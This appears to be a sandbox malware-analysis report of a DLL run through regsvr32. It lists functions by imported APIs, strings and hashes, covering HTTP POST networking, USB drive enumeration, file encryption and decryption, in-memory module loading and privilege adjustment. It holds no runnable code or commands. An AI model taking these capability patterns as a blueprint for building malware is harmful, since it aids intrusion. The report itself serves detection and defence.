Opcode ID: d8598b664ca96503437032bf4b57bfa9348ec0fc7046af409510203917353114
Instruction ID: d00baea76489f9255bbf67fa5e4fad7fa0cc474cea22de710415c398eb0c4781
Opcode Fuzzy Hash: d8598b664ca96503437032bf4b57bfa9348ec0fc7046af409510203917353114
Instruction Fuzzy Hash: 0003C4B2A241928ED775CE74D440FF93795FB84788F885139DA0BABB44DB7CAA09C740

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DA7940, Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 311networkfileUNIQUE

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00007FF983DA7A2C
InternetConnectW.WININET ref: 00007FF983DA7B12
HttpOpenRequestW.WININET ref: 00007FF983DA7B71
HttpSendRequestW.WININET ref: 00007FF983DA7BB0
HttpQueryInfoW.WININET ref: 00007FF983DA7BFB
InternetReadFile.WININET ref: 00007FF983DA7C94
WriteFile.KERNEL32 ref: 00007FF983DA7CBE
CloseHandle.KERNEL32 ref: 00007FF983DA7CD1
InternetCloseHandle.WININET ref: 00007FF983DA7CE8
InternetCloseHandle.WININET ref: 00007FF983DA7CF1
InternetCloseHandle.WININET ref: 00007FF983DA7CFC
GetLastError.KERNEL32 ref: 00007FF983DA7D48

Strings

HTTP/1.1, xrefs: 00007FF983DA7B67
8817a87579e4dcadedcbc9a460d07dfbc5bd6f7366ee53d109ec1591d95e4adf334b9492cb61e964b843a4306b9bb123c5e478366ff3198044af27f3e35f47eb06, xrefs: 00007FF983DA79F1
POST, xrefs: 00007FF983DA79AE

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$Http$FileOpenRequest$ConnectErrorInfoLastQueryReadSendWrite
String ID: 8817a87579e4dcadedcbc9a460d07dfbc5bd6f7366ee53d109ec1591d95e4adf334b9492cb61e964b843a4306b9bb123c5e478366ff3198044af27f3e35f47eb06$HTTP/1.1$POST
API String ID: 2464402415-3540460043
Opcode ID: b64f36e83008693a90338a4975157558bef2375a4d98157205b117e58c956d3a
Instruction ID: 216ea29dff884f0148d5f1e4e0946e59da342beafadcc1c4196733dbdd8c3fc3
Opcode Fuzzy Hash: b64f36e83008693a90338a4975157558bef2375a4d98157205b117e58c956d3a
Instruction Fuzzy Hash: 8FD119B2A1868281EB20DF95E454F6E7365FB84794FC44139DA8E97B95DFBCE048C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DA0B30, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 246UNIQUE

Download Yara Rule

APIs

GetVolumeInformationW.KERNEL32 ref: 00007FF983DA0C10
DeviceIoControl.KERNEL32 ref: 00007FF983DA0C81
CloseHandle.KERNEL32 ref: 00007FF983DA0C92
GetDriveTypeW.KERNEL32 ref: 00007FF983DA0CAA
QueryDosDeviceW.KERNEL32 ref: 00007FF983DA0CC4
SetupDiGetClassDevsW.SETUPAPI ref: 00007FF983DA0D38
SetupDiEnumDeviceInterfaces.SETUPAPI ref: 00007FF983DA0D71
SetupDiGetDeviceInterfaceDetailW.SETUPAPI ref: 00007FF983DA0DA0
SetupDiGetDeviceInterfaceDetailW.SETUPAPI ref: 00007FF983DA0DF7
DeviceIoControl.KERNEL32 ref: 00007FF983DA0E64
CloseHandle.KERNEL32 ref: 00007FF983DA0EE4
SetupDiDestroyDeviceInfoList.SETUPAPI ref: 00007FF983DA0EED
00007FF9AA922F90.SETUPAPI ref: 00007FF983DA0F02

Strings

\Floppy, xrefs: 00007FF983DA0CD2
USB\, xrefs: 00007FF983DA0F28

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: Device$Setup$CloseControlDetailHandleInterface$00007A922ClassDestroyDevsDriveEnumInfoInformationInterfacesListQueryTypeVolume
String ID: USB\$\Floppy
API String ID: 1516414671-497063568
Opcode ID: 70505352b08a9f918e3a3ad35f537230caff135ce23aa4ca6b87e56227af6aaa
Instruction ID: be188a47054b9bd862466a233c1c916498a41e7ba4ee8ece76c9cad00569aef5
Opcode Fuzzy Hash: 70505352b08a9f918e3a3ad35f537230caff135ce23aa4ca6b87e56227af6aaa
Instruction Fuzzy Hash: 3CC19472A18B4286E760CFA5E840FA97774FB48758F880139DA5EA3B94DF7CE549C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D989D0, Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 192encryptionUNIQUE

Download Yara Rule

APIs

CryptAcquireContextW.ADVAPI32 ref: 00007FF983D98A63
CryptGenRandom.ADVAPI32 ref: 00007FF983D98A7E
CryptCreateHash.ADVAPI32 ref: 00007FF983D98AA6
CryptHashData.ADVAPI32 ref: 00007FF983D98AC5
CryptDeriveKey.ADVAPI32 ref: 00007FF983D98AEE
CryptAcquireContextW.ADVAPI32 ref: 00007FF983D98B17
CryptImportKey.ADVAPI32 ref: 00007FF983D98B3E
CryptEncrypt.ADVAPI32 ref: 00007FF983D98B70
CryptReleaseContext.ADVAPI32 ref: 00007FF983D98B7D
_fread_nolock.LIBCMT ref: 00007FF983D98C37
CryptEncrypt.ADVAPI32 ref: 00007FF983D98C77
CryptDestroyKey.ADVAPI32 ref: 00007FF983D98CC0
CryptDestroyKey.ADVAPI32 ref: 00007FF983D98CCA
CryptDestroyHash.ADVAPI32 ref: 00007FF983D98CD5
CryptReleaseContext.ADVAPI32 ref: 00007FF983D98CE2

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00007FF983D98B09
@, xrefs: 00007FF983D98B01
u, xrefs: 00007FF983D98A1B

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: Crypt$Context$DestroyHash$AcquireEncryptRelease$CreateDataDeriveImportRandom_fread_nolock
String ID: @$Microsoft Enhanced Cryptographic Provider v1.0$u
API String ID: 2427540687-1418344745
Opcode ID: 3ac9ef445a7e533637a658a49cdaba0b4aa2f385d9f408c52e86d3762beffbe2
Instruction ID: 100f67f87428459855ccab45a6b0d50509d5572638fdcd1a68469e3cbc202b5e
Opcode Fuzzy Hash: 3ac9ef445a7e533637a658a49cdaba0b4aa2f385d9f408c52e86d3762beffbe2
Instruction Fuzzy Hash: C2917972B1864186EB10DFA1E454BAA77A0FBC4784F844039EE8E97B58DF7CE549CB00

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D98D10, Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 177encryptionUNIQUE

Download Yara Rule

APIs

Part of subcall function 00007FF983DC0B60: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DC0B84

_fread_nolock.LIBCMT ref: 00007FF983D98DC9
_fread_nolock.LIBCMT ref: 00007FF983D98DE0
CryptAcquireContextW.ADVAPI32 ref: 00007FF983D98E00
CryptImportKey.ADVAPI32 ref: 00007FF983D98E27
CryptDecrypt.ADVAPI32 ref: 00007FF983D98E51
CryptReleaseContext.ADVAPI32 ref: 00007FF983D98E5E
CryptAcquireContextW.ADVAPI32 ref: 00007FF983D98E7C
CryptCreateHash.ADVAPI32 ref: 00007FF983D98EA4
CryptHashData.ADVAPI32 ref: 00007FF983D98EC3
CryptDeriveKey.ADVAPI32 ref: 00007FF983D98EED
_fread_nolock.LIBCMT ref: 00007FF983D98F3B
CryptDecrypt.ADVAPI32 ref: 00007FF983D98F74
CryptDestroyKey.ADVAPI32 ref: 00007FF983D98FAF
CryptDestroyHash.ADVAPI32 ref: 00007FF983D98FBA
CryptReleaseContext.ADVAPI32 ref: 00007FF983D98FC7
CryptDestroyKey.ADVAPI32 ref: 00007FF983D98FD7

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00007FF983D98DF2
@, xrefs: 00007FF983D98DEA

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: Crypt$Context$DestroyHash_fread_nolock$AcquireDecryptRelease$CreateDataDeriveImport_invalid_parameter_noinfo
String ID: @$Microsoft Enhanced Cryptographic Provider v1.0
API String ID: 1281859089-3585394877
Opcode ID: df8c863f1cf3d4f0c18344a008a4b550c95367f196f2804c15b1e520c1b50b60
Instruction ID: b11bf0f2f5c2a879dc4684b821d88b483bec27f8a7af1c9141683df20ea07442
Opcode Fuzzy Hash: df8c863f1cf3d4f0c18344a008a4b550c95367f196f2804c15b1e520c1b50b60
Instruction Fuzzy Hash: 0281767261868186EB20DFA1E454FAA77A5FBC4784F844035EE8E97B58DF7CE509CB00

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DB5990, Relevance: 30.3, APIs: 9, Strings: 8, Instructions: 563UNIQUE

Download Yara Rule

Strings

.zoo, xrefs: 00007FF983DB5B9E
.tgz, xrefs: 00007FF983DB5BFD
.gz, xrefs: 00007FF983DB5BEA
.zip, xrefs: 00007FF983DB5B8B
.arj, xrefs: 00007FF983DB5BD7
.arc, xrefs: 00007FF983DB5BB1
.lzh, xrefs: 00007FF983DB5BC4
UT, xrefs: 00007FF983DB5EEC

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo$UT
API String ID: 0-715829385
Opcode ID: 8c7fb053e7aeb3b17acc237b9fbb7f9691bb80a753e70374dd642a27f528e31c
Instruction ID: 6555397ae021a2b1ba2e71b2564db6265e1c3bf31c5f87f7b955804058fbc113
Opcode Fuzzy Hash: 8c7fb053e7aeb3b17acc237b9fbb7f9691bb80a753e70374dd642a27f528e31c
Instruction Fuzzy Hash: 4052A3A2A0878289E761CF68D4407BD37A1FB45B88F984039DA4E9B795DFBCF548C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D99080, Relevance: 30.2, APIs: 15, Strings: 2, Instructions: 440fileUNIQUE

Download Yara Rule

APIs

WriteFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF983D99240
WriteFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF983D99260
GetTickCount.KERNEL32 ref: 00007FF983D99284
WriteFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF983D992C4
ReadFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF983D9949A
WriteFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF983D994F7
SetFilePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF983D99551
WriteFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF983D99576
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF983D9959F
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00007FF983D99609
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D996D4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D996DA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D996E0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D996E6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D99703

Strings

>> , xrefs: 00007FF983D99086
1877b14f76d190c640f7d995eb388ffb3d1aefe6bd5de3127ca548fd263ede4735, xrefs: 00007FF983D99165

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: File$Write_invalid_parameter_noinfo_noreturn$CloseHandle$CountPointerReadTick
String ID: 1877b14f76d190c640f7d995eb388ffb3d1aefe6bd5de3127ca548fd263ede4735$>>
API String ID: 672358132-3303638204
Opcode ID: ca706e9c69f227370a74179568b4a23ed18432dbf278796383ee53ccce1533e9
Instruction ID: e08c53ad2d13cc5527cff3341ff93a4dd7cb4335b8cee48c25a2152c30c92b17
Opcode Fuzzy Hash: ca706e9c69f227370a74179568b4a23ed18432dbf278796383ee53ccce1533e9
Instruction Fuzzy Hash: 8E02F1B2B146818AEB04CBB5D454BAD33E1FB89784F844139DE4EAB799DE7CE449C310

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DB7CFE, Relevance: 30.1, APIs: 20, Instructions: 115threadsleepUNIQUE

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 00007FF983DB7D64
CloseHandle.KERNEL32 ref: 00007FF983DB7D6D
CreateThread.KERNEL32 ref: 00007FF983DB7D8B
CloseHandle.KERNEL32 ref: 00007FF983DB7D94
CreateThread.KERNEL32 ref: 00007FF983DB7DB2
CloseHandle.KERNEL32 ref: 00007FF983DB7DBB
CreateThread.KERNEL32 ref: 00007FF983DB7DD9
CloseHandle.KERNEL32 ref: 00007FF983DB7DE2
CreateThread.KERNEL32 ref: 00007FF983DB7E00
CloseHandle.KERNEL32 ref: 00007FF983DB7E09
CreateThread.KERNEL32 ref: 00007FF983DB7E27
CloseHandle.KERNEL32 ref: 00007FF983DB7E30
Sleep.KERNEL32 ref: 00007FF983DB7E45
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7E7D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7E83
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7E89
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7E8F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7E95
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7E9B
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983DB7EA1

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$CloseCreateHandleThread$Sleep
String ID:
API String ID: 1970207563-0
Opcode ID: 0ae320eb1c64685204bdc4c1a2d68490e6e8ad8e35a24628bf2fb8a78407d72e
Instruction ID: 8a89e22387ba10c9d23689d352406a47783e7e4e33fc8eca4130a232f5306b1e
Opcode Fuzzy Hash: 0ae320eb1c64685204bdc4c1a2d68490e6e8ad8e35a24628bf2fb8a78407d72e
Instruction Fuzzy Hash: 8F41B1E290964283E714EFA1A459BB923A5FF48794FC8453DE94EAB695CF7CF148C200

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DA7020, Relevance: 24.4, APIs: 16, Instructions: 355memoryUNIQUE

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF983DA7079
GetNativeSystemInfo.KERNEL32 ref: 00007FF983DA70FA
VirtualAlloc.KERNEL32 ref: 00007FF983DA7142
VirtualAlloc.KERNEL32 ref: 00007FF983DA7164
GetProcessHeap.KERNEL32 ref: 00007FF983DA7177
RtlAllocateHeap.NTDLL ref: 00007FF983DA7189
VirtualFree.KERNEL32 ref: 00007FF983DA71A2
SetLastError.KERNEL32 ref: 00007FF983DA71AD
SetLastError.KERNEL32 ref: 00007FF983DA7210
VirtualFree.KERNEL32 ref: 00007FF983DA728E
GetProcessHeap.KERNEL32 ref: 00007FF983DA7294
HeapFree.KERNEL32 ref: 00007FF983DA72A2
VirtualAlloc.KERNEL32 ref: 00007FF983DA72EA
VirtualAlloc.KERNEL32 ref: 00007FF983DA7358
VirtualAlloc.KERNEL32 ref: 00007FF983DA739C
SetLastError.KERNEL32 ref: 00007FF983DA7544

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$ErrorHeapLast$Free$Process$AllocateInfoNativeSystem
String ID:
API String ID: 311326083-0
Opcode ID: f1cdf27b50a543ee295e9b25e8c14b3811a35c2eccdc1db56335470b02b29c2f
Instruction ID: c7810ebd31bafeb6cd80ffb2dfd964067ab86503b377dbfa8fc3c8e2b3bc8c14
Opcode Fuzzy Hash: f1cdf27b50a543ee295e9b25e8c14b3811a35c2eccdc1db56335470b02b29c2f
Instruction Fuzzy Hash: A9E1AFB2B1564186EB24DFA1D650B7973A5FB48B84F884438DA4EABB40DF7CF459C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983DDA4EC, Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1207COMMON

Download Yara Rule

APIs

fegetenv.LIBCMT ref: 00007FF983DDA535
_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DDAB40
_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DDAD03
_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DDAF0A
_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DDB1CE
_invalid_parameter_noinfo.LIBCMT ref: 00007FF983DDB3C9
memcpy_s.LIBCPMT ref: 00007FF983DDB4B7
memcpy_s.LIBCPMT ref: 00007FF983DDB562
memcpy_s.LIBCPMT ref: 00007FF983DDB62B

Strings

1#INF, xrefs: 00007FF983DDB6FF
1#QNAN, xrefs: 00007FF983DDB6E3
1#IND, xrefs: 00007FF983DDB6D1
1#SNAN, xrefs: 00007FF983DDB6DA

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 808467561-2761157908
Opcode ID: 107f43838dd47a772ed0d66cbca8b36dc9ee8a504dc2acb411d4a3ac4dd591a0
Instruction ID: f459ef3aa3efdfafbcebad3f714893229efab4c8cae3e2e603338b11eb519a24
Opcode Fuzzy Hash: 107f43838dd47a772ed0d66cbca8b36dc9ee8a504dc2acb411d4a3ac4dd591a0
Instruction Fuzzy Hash: 97B2B7F2A191828FE765CEA5D540FF937A1FB44348F985139DA0BA7B84DBB8B548C700

Uniqueness

Uniqueness Score: 5.06%

Function 00007FF983D96950, Relevance: 23.4, APIs: 12, Strings: 1, Instructions: 627UNIQUE

Download Yara Rule

APIs

_fread_nolock.LIBCMT ref: 00007FF983D96BC1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D972BC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D972C2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D972C8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D972CE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D972D4
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D972DA
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D972E0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D972F2
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D972F8
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D972FE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D97304

Part of subcall function 00007FF983DC0B60: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DC0B84

Part of subcall function 00007FF983DC1954: _invalid_parameter_noinfo.LIBCMT ref: 00007FF983DC1989

Strings

5691c606f068ee66f2b65d8c89de9f993ac27705dbd55f5b, xrefs: 00007FF983D9699E

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: _invalid_parameter_noinfo_noreturn$_invalid_parameter_noinfo$_fread_nolock
String ID: 5691c606f068ee66f2b65d8c89de9f993ac27705dbd55f5b
API String ID: 3619505198-66563769
Opcode ID: cfcd957a260f216062818d6d8a99835869a951549a8f165fcb4f7eb9a47190b9
Instruction ID: 8afb2e23433412bbf3323bee35d2a267d03170413eb97a3ffc0ea7d7f95fdc01
Opcode Fuzzy Hash: cfcd957a260f216062818d6d8a99835869a951549a8f165fcb4f7eb9a47190b9
Instruction Fuzzy Hash: 2142C2A2B1474185EB00DBA5D444BAD2361FB457A8F945239EE2E6BBD9DFBCE049C300

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D99710, Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 350fileUNIQUE

Download Yara Rule

APIs

ReadFile.KERNEL32 ref: 00007FF983D998B1
ReadFile.KERNEL32 ref: 00007FF983D99981
ReadFile.KERNEL32 ref: 00007FF983D9999C
ReadFile.KERNEL32 ref: 00007FF983D99A09
WriteFile.KERNEL32 ref: 00007FF983D99A9E
CloseHandle.KERNEL32 ref: 00007FF983D99ADE
CloseHandle.KERNEL32 ref: 00007FF983D99B15
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D99C20
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D99C26
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D99C2C
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D99C32
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D99C4F

Strings

1877b14f76d190c640f7d995eb388ffb3d1aefe6bd5de3127ca548fd263ede4735, xrefs: 00007FF983D997BB

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd

Yara matches

Similarity

API ID: File_invalid_parameter_noinfo_noreturn$Read$CloseHandle$Write
String ID: 1877b14f76d190c640f7d995eb388ffb3d1aefe6bd5de3127ca548fd263ede4735
API String ID: 4279757298-3815716874
Opcode ID: 8b1e56d16c13cf912fc946bd3b9e94057cc47bcbb687c3d4d16fb0d11a83946c
Instruction ID: 2f487c2738df7addf5b4c16165c5e693fa16461e37d085a887db55bdb874b3e0
Opcode Fuzzy Hash: 8b1e56d16c13cf912fc946bd3b9e94057cc47bcbb687c3d4d16fb0d11a83946c
Instruction Fuzzy Hash: 77E1E9B2B1468185EB00DFA5E4447AE37A1FB45798F844139DE5EA7B99DFBCE048C700

Uniqueness

Uniqueness Score: 100.00%

Function 00007FF983D929A0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103UNIQUE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF983D929C6
OpenProcessToken.ADVAPI32 ref: 00007FF983D929D7
LookupPrivilegeValueW.ADVAPI32 ref: 00007FF983D92A32
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF983D92B0B
GetLastError.KERNEL32 ref: 00007FF983D92B15
GetLastError.KERNEL32 ref: 00007FF983D92B29
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D92B52
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF983D92B58

Strings

61a50ee86d5169f861ea6d984ef250ec32f2b8353a1e10b8ab2833c2e07740c9, xrefs: 00007FF983D929FC

Memory Dump Source

Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true

Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
